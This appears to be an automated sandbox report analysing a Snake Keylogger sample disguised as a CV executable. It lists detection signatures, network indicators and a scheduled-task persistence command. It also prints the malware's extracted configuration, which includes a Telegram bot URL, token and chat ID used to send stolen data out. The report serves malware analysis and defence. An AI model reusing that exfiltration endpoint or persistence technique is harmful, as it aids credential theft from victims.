"C:\Users\user\Desktop\Kayla Dennis CV.exe", ProcessId: 4688, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp796.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp796.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Kayla Dennis CV.exe", ParentImage: C:\Users\user\Desktop\Kayla Dennis CV.exe, ParentProcessId: 6300, ParentProcessName: Kayla Dennis CV.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp796.tmp", ProcessId: 7184, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-18T18:21:23.022502+0100	2803305	3	Unknown Traffic	192.168.2.5	49713	188.114.96.3	443	TCP
2024-11-18T18:21:25.078851+0100	2803305	3	Unknown Traffic	192.168.2.5	49715	188.114.96.3	443	TCP
2024-11-18T18:21:30.399933+0100	2803305	3	Unknown Traffic	192.168.2.5	49726	188.114.96.3	443	TCP
2024-11-18T18:21:31.488065+0100	2803305	3	Unknown Traffic	192.168.2.5	49731	188.114.96.3	443	TCP
2024-11-18T18:21:32.219380+0100	2803305	3	Unknown Traffic	192.168.2.5	49732	188.114.96.3	443	TCP
2024-11-18T18:21:33.557836+0100	2803305	3	Unknown Traffic	192.168.2.5	49741	188.114.96.3	443	TCP
2024-11-18T18:21:38.783324+0100	2803305	3	Unknown Traffic	192.168.2.5	49773	188.114.96.3	443	TCP
2024-11-18T18:21:42.417169+0100	2803305	3	Unknown Traffic	192.168.2.5	49796	188.114.96.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-18T18:21:20.928058+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49711	132.226.247.73	80	TCP
2024-11-18T18:21:22.239368+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49711	132.226.247.73	80	TCP
2024-11-18T18:21:23.958124+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49714	132.226.247.73	80	TCP
2024-11-18T18:21:29.473739+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49721	132.226.247.73	80	TCP
2024-11-18T18:21:30.724304+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49721	132.226.247.73	80	TCP
2024-11-18T18:21:32.520608+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49733	132.226.247.73	80	TCP
2024-11-18T18:21:34.520631+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49748	132.226.247.73	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0000000B.00000002.3288992952.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7253575935:AAEoCGpTh1d2VtErBVh5tHQuO4O_SZJWbQk/sendMessage?chat_id=6246770128", "Token": "7253575935:AAEoCGpTh1d2VtErBVh5tHQuO4O_SZJWbQk", "Chat_id": "6246770128\n", "Version": "5.1"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe

ReversingLabs: Detection: 29%

Multi AV Scanner detection for submitted file

Source: Kayla Dennis CV.exe

ReversingLabs: Detection: 29%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Kayla Dennis CV.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Kayla Dennis CV.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49712 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49725 version: TLS 1.0

Source: Kayla Dennis CV.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000B.00000002.3283027662.0000000000C92000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000B.00000002.3283027662.0000000000C92000.00000002.00000001.01000000.0000000D.sdmp

Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Code function: 4x nop then jmp 0B1D0BD6h	0_2_0B1D046F
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Code function: 4x nop then jmp 0799FCC6h	12_2_0799F55F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05632819h	17_2_05632568
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05633640h	17_2_0563356E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0563D801h	17_2_0563D558
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05631F59h	17_2_05631CA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0563F211h	17_2_0563EF68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0563E0B1h	17_2_0563DE08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0563E961h	17_2_0563E6B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0563D3A9h	17_2_0563D100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 056323B9h	17_2_05632108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05633640h	17_2_056331F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05632C79h	17_2_056329C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0563DC59h	17_2_0563D9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	17_2_05630040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05631AF9h	17_2_05631848
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0563FAC1h	17_2_0563F818
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05630D0Eh	17_2_05630B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05631698h	17_2_05630B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0563EDB9h	17_2_0563EB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0563F669h	17_2_0563F3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0563E509h	17_2_0563E260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05633640h	17_2_05633228

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49714 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49748 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49711 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49733 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49721 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49715 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49713 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49731 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49732 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49726 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49773 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49741 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49796 -> 188.114.96.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49712 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49725 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: RegSvcs.exe, 0000000B.00000002.3288992952.000000000313C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000312F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003193000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003158000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003185000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000314A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000309C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C33000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BF8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BEA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 0000000B.00000002.3288992952.000000000313C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000312F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003193000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003158000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003185000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000314A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003090000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000309C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003165000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C33000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B8D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B3E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C13000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BF8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BEA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 0000000B.00000002.3288992952.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002A81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Kayla Dennis CV.exe, 00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: Kayla Dennis CV.exe, lyKbfEsVYfQfU.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: Kayla Dennis CV.exe, lyKbfEsVYfQfU.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: RegSvcs.exe, 0000000B.00000002.3296169497.0000000006600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microHy1s.
Source: Kayla Dennis CV.exe, lyKbfEsVYfQfU.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: RegSvcs.exe, 0000000B.00000002.3288992952.000000000313C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000312F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003193000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003158000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003185000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000314A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.00000000030B4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C33000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BF8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BEA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
